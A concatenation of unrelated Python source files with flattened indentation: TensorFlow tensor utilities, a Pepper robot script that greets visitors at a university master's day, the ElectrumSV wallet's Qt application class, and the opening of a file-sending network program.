# outputs = tf.einsum('...y,yz->...z', inputs, weight)
# Unfortunately ... in einsum() leads to extra HBM usage.
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
input_splitted = tf.split(inputs, num_blocks, axis=-1)
output_splitted = []
for i, input_i in enumerate(input_splitted):
output_splitted.append(
tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), input_i,
weight[i, :, :]))
output_mixed = [0.0] * num_blocks
for i in range(num_blocks):
for j in range(num_blocks):
output_mixed[i] += mix_kernel[i, j] * output_splitted[j]
output_splitted = output_mixed
outputs = tf.concat(output_splitted, axis=-1)
else:
outputs = BlockDiagonalMatmulWithMix(
tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight, mix_kernel,
num_blocks)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
def GetProcessedCheckpoints(runner_dir):
"""Returns the list of checkpoints previously processed by this runner."""
# Set up (or reload) a file storing the list of previously processed
# checkpoints. This caching allows jobs to run on VMs which may be
# interrupted without duplicating work.
processed_ckpts_path = os.path.join(runner_dir, 'processed_ckpts.txt')
if not tf.io.gfile.exists(processed_ckpts_path):
with tf.io.gfile.GFile(processed_ckpts_path, 'w') as f:
f.write('')
with tf.io.gfile.GFile(processed_ckpts_path, 'r') as f:
processed_ckpts = list(line.strip() for line in f.readlines())
return processed_ckpts
def UpdateProcessedCheckpoints(runner_dir, ckpt_path):
"""Denotes 'ckpt_path' as having been processed by this runner."""
processed_ckpts_path = os.path.join(runner_dir, 'processed_ckpts.txt')
# Some file systems don't support append operations, so we rewrite whole
# file to append the latest checkpoint.
processed_ckpts = GetProcessedCheckpoints(runner_dir)
processed_ckpts.append(ckpt_path)
with tf.io.gfile.GFile(processed_ckpts_path, 'w') as f:
f.write('\n'.join(processed_ckpts) + '\n')
def MergeDictsWithValueCheck(dict1, dict2):
"""Merges two dictionaries with same-key values."""
common_keys = set(dict1.keys()) & set(dict2.keys())
for key in common_keys:
# The values must be the same object
if dict1[key] is not dict2[key]:
raise RuntimeError(f'The same key {key} corresponds to different values '
f'in the dictionaries: {dict1[key]} vs {dict2[key]}')
dict1.update(dict2)
return dict1
def MergeDuplicateIds(ids, paddings, extra_tensors=None):
"""Merge consecutive duplicated ids.
Given ids = [4, 4, 5, 6, 6, 5, 0, 0] and paddings =[0, 0, 0, 0, 0, 0, 1, 1],
this function returns ret_ids = [4, 5, 6, 5, 0, 0, 0, 0] and paddings = [
0, 0, 0, 0, 1, 1, 1, 1] by merging consecutive duplicated ids.
Args:
ids: A non-negative tensor of shape [batch, time].
paddings: A padding tensor of shape [batch, time] with "0" non padded, and
"1" as padded..
extra_tensors: A `.NestedMap` containing tensors that need to be
deduplicated according to ids, each tensor at least has two dimensions.
Returns:
ret_ids: same as ids.
ret_paddings: same as paddings.
ret_tensors: same as extra_tensors.
"""
ids = with_dependencies([assert_greater_equal(ids, 0)], ids)
prev_ids = tf.pad(ids, [[0, 0], [1, 0]], constant_values=-1)[:, :-1]
keep = tf.cast(tf.math.not_equal(ids, prev_ids), tf.int32) * tf.cast(
1 - paddings, tf.int32)
b, t = GetShape(ids)
# Generate descend_keep in descending order for each row and set elements in
# the matrix to 0 if they are duplicated ids.
descend_keep = keep * tf.range(t, 0, -1, dtype=tf.int32)
# Get the indices of non-duplicated ids along the time axis.
sorted_indices = tf.argsort(descend_keep, stable=True, direction='DESCENDING')
# Get the batch indices.
batch_indices = tf.tile(tf.expand_dims(tf.range(b), -1), [1, t])
# Stack them to get 2-d indices.
ids_indices = tf.stack([batch_indices, sorted_indices], axis=2)
seq_mask = tf.sequence_mask(tf.reduce_sum(keep, axis=-1), t, paddings.dtype)
ret_paddings = 1. - seq_mask
ret_ids = tf.gather_nd(ids, ids_indices) * tf.cast(seq_mask, ids.dtype)
ret_tensors = NestedMap()
if extra_tensors:
for key, tensor in extra_tensors.items():
tensor_mask = ExpandTo(seq_mask, GetRank(tensor))
ret_tensors[key] = tf.gather_nd(tensor, ids_indices) * tf.cast(
tensor_mask, tensor.dtype)
return ret_ids, ret_paddings, ret_tensors
def DecodeProtoField(serialized_protos, message_type, field_name, output_type):
"""Decodes a non-repeated field in a proto.
Args:
serialized_protos: A string Tensor of shape [batch].
message_type: Name of the proto message type. Since tf.io.decode_proto() is
called with the default descriptor_source='local://', the C++ (not Python!)
proto definition(s) must be linked to the binary. You can link in a proto
descriptor by creating a cc_library target with alwayslink=1.
field_name: Name of the field.
output_type: A DType for the output.
Returns:
A Tensor of shape [batch].
"""
_, [output] = tf.io.decode_proto(serialized_protos, message_type,
[field_name], [output_type])
return tf.squeeze(output, -1)
def DecodeRepeatedProtoField(serialized_protos, message_type, field_name,
output_type):
"""Decodes a repeated field in a proto.
Args:
serialized_protos: A string Tensor of shape [batch].
message_type: Name of the proto message type. Since tf.io.decode_proto() is
called with the default descriptor_source='local://', the C++ (not Python!)
proto definition(s) must be linked to the binary. You can link in a proto
descriptor by creating a cc_library target with alwayslink=1.
field_name: Name of the field.
output_type: A DType for the output.
Returns:
A Tensor of shape [batch, field_name_size].
"""
[output] = tf.io.decode_proto(serialized_protos, message_type, [field_name],
[output_type]).values
return output
|
masters_day.py | from pepper.framework import *
from pepper.responder import *
from pepper.knowledge import sentences, animations
from pepper.language import Utterance
from pepper.language.generation.reply import reply_to_question
from pepper import config
from threading import Thread
from random import choice
from time import time
SPEAKER_NAME_THIRD = "Dear guest"
SPEAKER_NAME = "Dear guest"
SPEAKER_FACE = "HUMAN"
DEFAULT_SPEAKER = "Human"
TOPIC_NAME = "Master Information Day"
TOPIC_ROBOT_THOUGHT = "A future where humans and robots work together is not too far from now. Masters degrees that give the skills for this future will be very valuable."
LOCATION_NAME = "The main building at the VU"
VU_NAME_PHONETIC = r"\\toi=lhp\\ fraiE universitai_t Amster_dam \\toi=orth\\"
IMAGE_VU = "https://www.vu.nl/nl/Images/VUlogo_NL_Wit_HR_RGB_tcm289-201376.png"
IMAGE_SELENE = "http://wordpress.let.vupr.nl/understandinglanguagebymachines/files/2019/06/7982_02_34_Selene_Orange_Unsharp_Robot_90kb.jpg"
IMAGE_LENKA = "http://wordpress.let.vupr.nl/understandinglanguagebymachines/files/2019/06/8249_Lenka_Word_Object_Reference_106kb.jpg"
IMAGE_BRAM = "http://makerobotstalk.nl/files/2018/12/41500612_1859783920753781_2612366973928996864_n.jpg"
IMAGE_LEA = "http://www.cltl.nl/files/2020/03/Lea.jpg"
IMAGE_PIEK = "http://www.cltl.nl/files/2019/10/8025_Classroom_Piek.jpg"
IMAGE_NLP = "https://miro.medium.com/max/1000/1*CtR2lIHDkhB9M8Jt4irSyg.gif"
TOPIC_QUERY = "Masters degrees"
TOPIC_QUESTION = "What master programme are you interested in?"
TOPIC_ANSWER = "Do you have a question for me?"
MIN_ANSWER_LENGTH = 4
# Override Speech Speed for added clarity!
config.NAOQI_SPEECH_SPEED = 90
RESPONDERS = [
BrainResponder(),
VisionResponder(), PreviousUtteranceResponder(), IdentityResponder(), LocationResponder(), TimeResponder(),
QnAResponder(),
GreetingResponder(), GoodbyeResponder(), ThanksResponder(), AffirmationResponder(), NegationResponder(),
UnknownResponder()
]
class PresentTeamApp(AbstractApplication, StatisticsComponent,
SubtitlesComponent,
BrainComponent, ContextComponent,
ObjectDetectionComponent, FaceRecognitionComponent,
SpeechRecognitionComponent, TextToSpeechComponent):
SUBTITLES_URL = "https://bramkraai.github.io/subtitle?text={}"
def __init__(self, backend):
super(PresentTeamApp, self).__init__(backend)
self.tablet.show(IMAGE_VU)
def say(self, text, animation=None, block=True):
super(PresentTeamApp, self).say(text, animation, block)
sleep(1.5)
def show_text(self, text):
self.backend.tablet.show(self.SUBTITLES_URL.format(text))
class WaitForStartCueIntention(AbstractIntention, PresentTeamApp):
START_CUE_TEXT = [
"hello",
"hallo",
"hi",
"morning",
"evening",
"afternoon",
"hoi",
"who are you",
"a guest arrived",
"you may begin",
"you may start",
"you can begin",
"you can start",
"robot"
]
GREET_TIMEOUT = 15 # Only Greet people once every X seconds
def __init__(self, application):
"""Greets New and Known People"""
self.name_time = {} # Dictionary of <name, time> pairs, to keep track of who is greeted when
super(WaitForStartCueIntention, self).__init__(application)
# Initialize Response Picker
self.response_picker = ResponsePicker(self, RESPONDERS)
# Start Chat with Default Speaker
self.context.start_chat(DEFAULT_SPEAKER)
def on_face_known(self, faces):
"""
On Person Event.
Called every time a known face is detected.
"""
for person in faces:
if self.is_greeting_appropriate(person.name):
self.say("Hello, {}!".format(person.name))
def on_face_new(self, faces):
"""
On New Person Event.
Called every time an unknown face is detected.
"""
if self.is_greeting_appropriate("new"):
self.say("I see a new person!, Hello stranger!")
def is_greeting_appropriate(self, name):
"""Returns True if greeting is appropriate and updates Greeting Time"""
# Appropriateness arises when
# 1. person hasn't been seen before, or
# 2. enough time has passed since last sighting
if name not in self.name_time or (time() - self.name_time[name]) > self.GREET_TIMEOUT:
# Store last seen time (right now) in name_time dictionary
self.name_time[name] = time()
# Return "Appropriate"
return True
# Return "Not Appropriate"
return False
def on_face(self, faces):
# If Start Face Cue is observed by Leolani -> Start Main Intention
if self.is_greeting_appropriate("new"):
self.say("I see a new person!, Hello stranger!")
IntroductionIntention(self.application)
# Before was like this
if any([self.on_face_new(face) for face in faces]):
self.say("Ah, I can see {}! Let me begin!".format(SPEAKER_NAME_THIRD))
IntroductionIntention(self.application)
# Changed to this
if len(faces) == 0:
self.say("Ah, I can see {}! Let me begin!".format(SPEAKER_NAME_THIRD))
IntroductionIntention(self.application)
def on_chat_turn(self, utterance):
# If Start Text Cue is observed by Leolani -> Respond Happy & Start Main Intention
transcript = utterance.transcript.lower()
if any([cue in transcript for cue in self.START_CUE_TEXT]):
self.say("Oh, {}!".format(choice(sentences.HAPPY)), animation=animations.HAPPY)
IntroductionIntention(self.application)
return
class IntroductionIntention(AbstractIntention, PresentTeamApp):
def __init__(self, application):
super(IntroductionIntention, self).__init__(application)
# Start Chat with Main Speaker
self.context.start_chat(SPEAKER_NAME)
# Start Speech
Thread(target=self.speech).start()
def speech(self):
# 1.1 - Welcome
self.say("Hello {}. Welcome to the {}. ...".format(SPEAKER_NAME, LOCATION_NAME), animations.BOW)
self.say("My apologies is I am slow today, my internet connection is not very good")
self.say("We are thrilled to have you here!")
# 1.2 - Introduction
self.say(r"I am lio-lawhni... My name means \\vct=50\\ Voice of an Angel \\vct=100\\. in Hawaiian.",
animations.I)
self.say("I am built by students from the VU that come from all over the world. ", animations.ONCE_UPON_A_TIME)
self.tablet.show(IMAGE_SELENE)
sleep(1.0)
self.say("Selene, from Mexico, designed my brain and thoughts!", animations.TABLET)
self.tablet.show(IMAGE_LENKA)
sleep(1.0)
self.say("Lenka, from Serbia, taught me to understand language", animations.TABLET)
self.tablet.show(IMAGE_BRAM)
sleep(1.0)
self.say("Bram, from the Netherlands, programmed me to perceive the world around me.", animations.TABLET)
self.tablet.show(IMAGE_LEA)
sleep(1.0)
self.say("Lea, from Germany, has recently joined the team and will help me improve my language understanding.",
animations.TABLET)
self.tablet.show(IMAGE_PIEK)
sleep(1.0)
self.say(
"Peek, from the Netherlands, and I, from France and Japan, work on identity, reference and perspective in language!",
animations.TABLET)
self.tablet.show(IMAGE_VU)
sleep(2.5)
# 2.1 - Topic Introduction
self.say("I believe you are here for " + TOPIC_NAME, animations.THINK)
self.say("Here at the {} there are many interesting programs to choose from! ".format(VU_NAME_PHONETIC),
animations.ENTHUSIASTIC)
self.say("I am just a robot, but I have my little robot thoughts...", animations.SHY)
self.say(TOPIC_ROBOT_THOUGHT)
# 2.2 - Topic Knowledge
self.say("As a robot, I have learned a few things about " + TOPIC_QUERY + " myself!", animations.THINK)
self.say("For example, the Linguistics Department here offers a specialized program on Text Mining ",
animations.JOYFUL)
# 2.2.1 - Topic in the News
self.say("{}".format(choice(sentences.USED_WWW)))
self.say(choice(sentences.FUN_NLP_FACTS))
self.tablet.show(IMAGE_NLP)
sleep(5.0)
self.say("Impressive, right?".format(choice(sentences.HAPPY)), animations.EXCITED)
# 2.2.2 - Topic in Brain
self.say("I also have been talking about " + TOPIC_NAME + " with my friends!")
self.topic_in_brain()
self.say("I learn a lot from my friends!")
sleep(2.5)
# Move to Topic QnA
TopicQuestionIntention(self.application)
def topic_in_brain(self):
self.answer_brain_query("what is " + TOPIC_QUERY + " ")
def answer_brain_query(self, query):
try:
question = self.context.chat.add_utterance([UtteranceHypothesis(query, 1)], False)
question.analyze()
brain_response = self.brain.query_brain(question)
reply = reply_to_question(brain_response)
if reply: self.say(reply, block=False)
except Exception as e:
self.log.error(e)
# 2.3 - Topic Question
class TopicQuestionIntention(AbstractIntention, PresentTeamApp):
def __init__(self, application):
super(TopicQuestionIntention, self).__init__(application)
# Initialize Response Picker
self.response_picker = ResponsePicker(self, RESPONDERS)
self._retried = False
# Start Chat with Speaker if not already running
if not self.context.chatting:
self.context.start_chat(SPEAKER_NAME)
# Ask Topic Question
self.say("Oh {}, I think I have a question for you!".format(SPEAKER_NAME), animations.EXPLAIN)
self.show_text(TOPIC_QUESTION)
self.say(TOPIC_QUESTION)
def on_chat_turn(self, utterance):
responder = self.response_picker.respond(utterance)
if self.context.chat.last_utterance.transcript.endswith("?"):
self.say("Oops, nevermind me asking these questions. I'm just a very curious robot!", animations.ASHAMED)
# If Pepper does not understand?
if isinstance(responder, UnknownResponder) and len(utterance.tokens) < MIN_ANSWER_LENGTH and not self._retried:
# -> Repeat Question
self._retried = True
self.say("But, {}".format(TOPIC_QUESTION))
else: # If a decent response can be formed
# -> Thank Speaker and Move on to TopicAnswerIntention
self.say("That sounds interesting! I wish you the best of luck", animations.HAPPY)
self.tablet.show(IMAGE_VU)
TopicAnswerIntention(self.application)
# 2.4 - Topic Answer
class TopicAnswerIntention(AbstractIntention, PresentTeamApp):
def __init__(self, application):
super(TopicAnswerIntention, self).__init__(application)
# Initialize Response Picker
self.response_picker = ResponsePicker(self, RESPONDERS)
self._retried = False
# Start Chat with Speaker if not already running
if not self.context.chatting:
self.context.start_chat(SPEAKER_NAME)
self.show_text(TOPIC_ANSWER)
self.say(TOPIC_ANSWER)
def on_chat_turn(self, utterance):
responder = self.response_picker.respond(utterance)
if self.context.chat.last_utterance.transcript.endswith("?"):
self.say("Oops, nevermind me asking these questions. I'm just a very curious robot!", animations.ASHAMED)
# If Pepper does not understand?
if isinstance(responder, UnknownResponder) and len(utterance.tokens) < MIN_ANSWER_LENGTH and not self._retried:
# -> Repeat Question
self._retried = True
self.say("But, {}".format(TOPIC_ANSWER))
else: # If a decent response can be formed
# -> Thank Speaker and Move on to OutroIntention
self.say("Thank you!", animations.HAPPY)
self.tablet.show(IMAGE_VU)
OutroIntention(self.application)
class OutroIntention(AbstractIntention, PresentTeamApp):
def __init__(self, application):
super(OutroIntention, self).__init__(application)
# Initialize Response Picker
self.response_picker = ResponsePicker(self, RESPONDERS)
# Start Chat with Speaker if not already running
if not self.context.chatting:
self.context.start_chat(SPEAKER_NAME)
Thread(target=self.speech).start()
def speech(self):
# 5.1 - Wish all a fruitful discussion
self.say("I see that there are {0} people here... I wish all {0} of you a fruitful discussion!".format(
len([obj for obj in self.context.objects if obj.name == "person"])), animations.HELLO)
# 5.2 - Goodbye
self.say("It's a pity we could not talk more and get to know each other.",
animations.FRIENDLY)
self.say("It was nice having talked to you, {}! ... ...".format(SPEAKER_NAME), animations.BOW)
self.say("If you have any questions, you can always ask me later!")
sleep(4)
self.say("You may make a selfie with me! I love pictures!", animations.HAPPY)
# Switch to Default Intention
DefaultIntention(self.application)
class DefaultIntention(AbstractIntention, PresentTeamApp):
IGNORE_TIMEOUT = 60
def __init__(self, application):
super(DefaultIntention, self).__init__(application)
self._ignored_people = {}
self.response_picker = ResponsePicker(self, RESPONDERS)
def on_chat_enter(self, name):
self._ignored_people = {n: t for n, t in self._ignored_people.items() if time() - t < self.IGNORE_TIMEOUT}
if name not in self._ignored_people:
self.context.start_chat(name)
self.say("{}, {}".format(choice(sentences.GREETING), name))
def on_chat_exit(self):
self.say("{}, {}".format(choice(sentences.GOODBYE), self.context.chat.speaker))
self.context.stop_chat()
def on_chat_turn(self, utterance):
responder = self.response_picker.respond(utterance)
if isinstance(responder, GoodbyeResponder):
self._ignored_people[utterance.chat.speaker] = time()
self.context.stop_chat()
def on_face(self, faces):
self.say("Ah, I can see someone! Let me begin!")
WaitForStartCueIntention(self.application)
if __name__ == '__main__':
# Initialize Application
application = PresentTeamApp(config.get_backend())
# Initialize Intention
WaitForStartCueIntention(application)
# Run Application
application.run()
|
app.py | # ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''ElectrumSV application.'''
import concurrent
import datetime
import os
from functools import partial
import signal
import sys
import threading
from typing import Callable, Optional
from aiorpcx import run_in_thread
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import pyqtSignal, QObject, QTimer
from PyQt5.QtGui import QGuiApplication
from PyQt5.QtWidgets import QApplication, QSystemTrayIcon, QMenu, QWidget, QDialog
from electrumsv.app_state import app_state
from electrumsv.contacts import ContactEntry, ContactIdentity
from electrumsv.i18n import _, set_language
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, Wallet
from electrumsv.wallet_database.tables import WalletEventRow
from . import dialogs
from .cosigner_pool import CosignerPool
from .main_window import ElectrumWindow
from .exception_window import Exception_Hook
from .label_sync import LabelSync
from .log_window import SVLogWindow, SVLogHandler
from .util import ColorScheme, get_default_language, MessageBox, read_QIcon
from .wallet_wizard import WalletWizard
logger = logs.get_logger('app')
class OpenFileEventFilter(QObject):
def __init__(self, windows):
super().__init__()
self.windows = windows
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.FileOpen:
if len(self.windows) >= 1:
self.windows[0].pay_to_URI(event.url().toString())
return True
return False
class SVApplication(QApplication):
# Signals need to be on a QObject
create_new_window_signal = pyqtSignal(str, object)
cosigner_received_signal = pyqtSignal(object, object)
labels_changed_signal = pyqtSignal(object, object, object)
window_opened_signal = pyqtSignal(object)
window_closed_signal = pyqtSignal(object)
# Async tasks
async_tasks_done = pyqtSignal()
# Logging
new_category = pyqtSignal(str)
new_log = pyqtSignal(object)
# Preferences updates
fiat_ccy_changed = pyqtSignal()
custom_fee_changed = pyqtSignal()
op_return_enabled_changed = pyqtSignal()
num_zeros_changed = pyqtSignal()
base_unit_changed = pyqtSignal()
fiat_history_changed = pyqtSignal()
fiat_balance_changed = pyqtSignal()
update_check_signal = pyqtSignal(bool, object)
# Contact events
contact_added_signal = pyqtSignal(object, object)
contact_removed_signal = pyqtSignal(object)
identity_added_signal = pyqtSignal(object, object)
identity_removed_signal = pyqtSignal(object, object)
new_notification = pyqtSignal(object, object)
def __init__(self, argv):
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_X11InitThreads)
if hasattr(QtCore.Qt, "AA_ShareOpenGLContexts"):
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_ShareOpenGLContexts)
if hasattr(QGuiApplication, 'setDesktopFileName'):
QGuiApplication.setDesktopFileName('electrum-sv.desktop')
super().__init__(argv)
self.windows = []
self.log_handler = SVLogHandler()
self.log_window = None
self.net_dialog = None
self.timer = QTimer()
self.exception_hook = None
# A floating point number, e.g. 129.1
self.dpi = self.primaryScreen().physicalDotsPerInch()
# init tray
self.dark_icon = app_state.config.get("dark_icon", False)
self.tray = QSystemTrayIcon(self._tray_icon(), None)
self.tray.setToolTip('ElectrumSV')
self.tray.activated.connect(self._tray_activated)
self._build_tray_menu()
self.tray.show()
# FIXME Fix what.. what needs to be fixed here?
set_language(app_state.config.get('language', get_default_language()))
logs.add_handler(self.log_handler)
self._start()
def _start(self):
self.setWindowIcon(read_QIcon("electrum-sv.png"))
self.installEventFilter(OpenFileEventFilter(self.windows))
self.create_new_window_signal.connect(self.start_new_window)
self.async_tasks_done.connect(app_state.async_.run_pending_callbacks)
self.num_zeros_changed.connect(partial(self._signal_all, 'on_num_zeros_changed'))
self.fiat_ccy_changed.connect(partial(self._signal_all, 'on_fiat_ccy_changed'))
self.base_unit_changed.connect(partial(self._signal_all, 'on_base_unit_changed'))
self.fiat_history_changed.connect(partial(self._signal_all, 'on_fiat_history_changed'))
# Toggling of showing addresses in the fiat preferences.
self.fiat_balance_changed.connect(partial(self._signal_all, 'on_fiat_balance_changed'))
self.update_check_signal.connect(partial(self._signal_all, 'on_update_check'))
ColorScheme.update_from_widget(QWidget())
def _signal_all(self, method, *args):
for window in self.windows:
getattr(window, method)(*args)
def _close(self):
for window in self.windows:
window.close()
def close_window(self, window) -> None:
# NOTE: `ElectrumWindow` removes references to itself while it is closing. This creates
# a problem where it gets garbage collected before it's Qt5 `closeEvent` handling is
# completed and on Linux/MacOS it segmentation faults. On Windows, it is fine.
QTimer.singleShot(0, partial(self._close_window, window))
logger.debug("app.close_window.queued")
def _close_window(self, window):
logger.debug(f"app.close_window.executing {window!r}")
app_state.daemon.stop_wallet_at_path(window._wallet.get_storage_path())
self.windows.remove(window)
self.window_closed_signal.emit(window)
self._build_tray_menu()
if not self.windows:
self._last_window_closed()
def setup_app(self):
# app_state.daemon is initialised after app. Setup things dependent on daemon here.
pass
def _build_tray_menu(self):
# Avoid immediate GC of old menu when window closed via its action
if self.tray.contextMenu() is None:
m = QMenu()
self.tray.setContextMenu(m)
else:
m = self.tray.contextMenu()
m.clear()
for window in self.windows:
submenu = m.addMenu(window._wallet.name())
submenu.addAction(_("Show/Hide"), window.show_or_hide)
submenu.addAction(_("Close"), window.close)
m.addAction(_("Dark/Light"), self._toggle_tray_icon)
m.addSeparator()
m.addAction(_("Exit ElectrumSV"), self._close)
self.tray.setContextMenu(m)
def _tray_icon(self):
if self.dark_icon:
return read_QIcon('electrumsv_dark_icon.png')
else:
return read_QIcon('electrumsv_light_icon.png')
def _toggle_tray_icon(self) -> None:
self.dark_icon = not self.dark_icon
app_state.config.set_key("dark_icon", self.dark_icon, True)
self.tray.setIcon(self._tray_icon())
def _tray_activated(self, reason) -> None:
if reason == QSystemTrayIcon.DoubleClick:
if all([w.is_hidden() for w in self.windows]):
for w in self.windows:
w.bring_to_top()
else:
for w in self.windows:
w.hide()
def new_window(self, path: Optional[str], uri: Optional[str]=None) -> None:
# Use a signal as can be called from daemon thread
self.create_new_window_signal.emit(path, uri)
def show_network_dialog(self, parent) -> None:
if not app_state.daemon.network:
parent.show_warning(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'), title=_('Offline'))
return
if self.net_dialog:
self.net_dialog.on_update()
self.net_dialog.show()
self.net_dialog.raise_()
return
from . import network_dialog
# from importlib import reload
# reload(network_dialog)
self.net_dialog = network_dialog.NetworkDialog(app_state.daemon.network, app_state.config)
self.net_dialog.show()
def show_log_viewer(self) -> None:
if self.log_window is None:
self.log_window = SVLogWindow(None, self.log_handler)
self.log_window.show()
def _last_window_closed(self) -> None:
for dialog in (self.net_dialog, self.log_window):
if dialog:
dialog.accept()
def on_transaction_label_change(self, wallet: Wallet, tx_hash: bytes, text: str) -> None:
self.label_sync.set_transaction_label(wallet, tx_hash, text)
def on_keyinstance_label_change(self, account: AbstractAccount, key_id: int, text: str) -> None:
self.label_sync.set_keyinstance_label(account, key_id, text)
def _create_window_for_wallet(self, wallet: Wallet) -> ElectrumWindow:
w = ElectrumWindow(wallet)
self.windows.append(w)
self._build_tray_menu()
self._register_wallet_events(wallet)
self.window_opened_signal.emit(w)
return w
def _register_wallet_events(self, wallet: Wallet) -> None:
wallet.contacts._on_contact_added = self._on_contact_added
wallet.contacts._on_contact_removed = self._on_contact_removed
wallet.contacts._on_identity_added = self._on_identity_added
wallet.contacts._on_identity_removed = self._on_identity_removed
def _on_identity_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_added_signal.emit(contact, identity)
def _on_identity_removed(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_removed_signal.emit(contact, identity)
def _on_contact_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.contact_added_signal.emit(contact, identity)
def _on_contact_removed(self, contact: ContactEntry) -> None:
self.contact_removed_signal.emit(contact)
def on_new_wallet_event(self, wallet_path: str, row: WalletEventRow) -> None:
self.new_notification.emit(wallet_path, row)
def get_wallet_window(self, path: str) -> Optional[ElectrumWindow]:
for w in self.windows:
if w._wallet.get_storage_path() == path:
return w
def get_wallet_window_by_id(self, account_id: int) -> Optional[ElectrumWindow]:
for w in self.windows:
for account in w._wallet.get_accounts():
if account.get_id() == account_id:
return w
def start_new_window(self, wallet_path: Optional[str], uri: Optional[str]=None,
is_startup: bool=False) -> Optional[ElectrumWindow]:
'''Raises the window for the wallet if it is open. Otherwise
opens the wallet and creates a new window for it.'''
for w in self.windows:
if w._wallet.get_storage_path() == wallet_path:
w.bring_to_top()
break
else:
wizard_window: Optional[WalletWizard] = None
if wallet_path is not None:
is_valid, was_aborted, wizard_window = WalletWizard.attempt_open(wallet_path)
if was_aborted:
return None
if not is_valid:
wallet_filename = os.path.basename(wallet_path)
MessageBox.show_error(
_("Unable to load file '{}'.").format(wallet_filename))
return None
else:
wizard_window = WalletWizard(is_startup=is_startup)
if wizard_window is not None:
result = wizard_window.run()
if result != QDialog.Accepted:
return None
wallet_path = wizard_window.get_wallet_path()
# We cannot rely on accept alone indicating success.
if wallet_path is None:
return None
wallet = app_state.daemon.load_wallet(wallet_path)
assert wallet is not None
w = self._create_window_for_wallet(wallet)
if uri:
w.pay_to_URI(uri)
w.bring_to_top()
w.setWindowState(w.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
# this will activate the window
w.activateWindow()
return w
def update_check(self) -> None:
if (not app_state.config.get('check_updates', True) or
app_state.config.get("offline", False)):
return
def f():
import requests
try:
response = requests.request(
'GET', "https://electrumsv.io/release.json",
headers={'User-Agent' : 'ElectrumSV'}, timeout=10)
result = response.json()
self._on_update_check(True, result)
except Exception:
self._on_update_check(False, sys.exc_info())
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _on_update_check(self, success: bool, result: dict) -> None:
if success:
when_checked = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('last_update_check', result)
app_state.config.set_key('last_update_check_time', when_checked, True)
self.update_check_signal.emit(success, result)
def initial_dialogs(self) -> None:
'''Suppressible dialogs that are shown when first opening the app.'''
dialogs.show_named('welcome-ESV-1.3.10')
def event_loop_started(self) -> None:
self.cosigner_pool = CosignerPool()
self.label_sync = LabelSync()
if app_state.config.get("show_crash_reporter", default=True):
self.exception_hook = Exception_Hook(self)
self.timer.start()
signal.signal(signal.SIGINT, lambda *args: self.quit())
self.initial_dialogs()
path = app_state.config.get_cmdline_wallet_filepath()
if not self.start_new_window(path, app_state.config.get('url'), is_startup=True):
self.quit()
def run_app(self) -> None:
when_started = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('previous_start_time', app_state.config.get("start_time"))
app_state.config.set_key('start_time', when_started, True)
self.update_check()
threading.current_thread().setName('GUI')
self.timer.setSingleShot(False)
self.timer.setInterval(500) # msec
self.timer.timeout.connect(app_state.device_manager.timeout_clients)
QTimer.singleShot(0, self.event_loop_started)
self.exec_()
logs.remove_handler(self.log_handler)
# Shut down the timer cleanly
self.timer.stop()
# clipboard persistence
# see http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html
event = QtCore.QEvent(QtCore.QEvent.Clipboard)
self.sendEvent(self.clipboard(), event)
self.tray.hide()
def run_coro(self, coro, *args, on_done=None):
'''Run a coroutine. on_done, if given, is passed the future containing the reuslt or
exception, and is guaranteed to be called in the context of the GUI thread.
'''
def task_done(future):
self.async_tasks_done.emit()
future = app_state.async_.spawn(coro, *args, on_done=on_done)
future.add_done_callback(task_done)
return future
def run_in_thread(self, func, *args,
on_done: Optional[Callable[[concurrent.futures.Future], None]]=None):
'''Run func(*args) in a thread. on_done, if given, is passed the future containing the
reuslt or exception, and is guaranteed to be called in the context of the GUI
thread.
'''
return self.run_coro(run_in_thread, func, *args, on_done=on_done)
|
sender.py | import sys
import socket
import time
import timeit
from socket import *
import os
import struct
import hashlib
import pickle
import random
from threading import Thread
import time
import timeit
from operator import xor
import io
import threading
class Sender:
def __init__(self):
ack = 0
flag = 0
mss = int(sys.argv[5])
self.mass = mss
self.cd = float(sys.argv[9])
self.dp = float(sys.argv[7])
self.pdl = float(sys.argv[12])
window_1 = int(sys.argv[4])
self.window_size = window_1//mss
filename = str(sys.argv[3])
f = io.open(filename,"rb")
self.data = []
a = f.read(mss)
size_store = []
temp = 0
cs = 0
temp += len(a)
size_store.append(temp)
while a:
self.data.append(a)
a = f.read(mss)
if a:
temp += len(a)
size_store.append(temp)
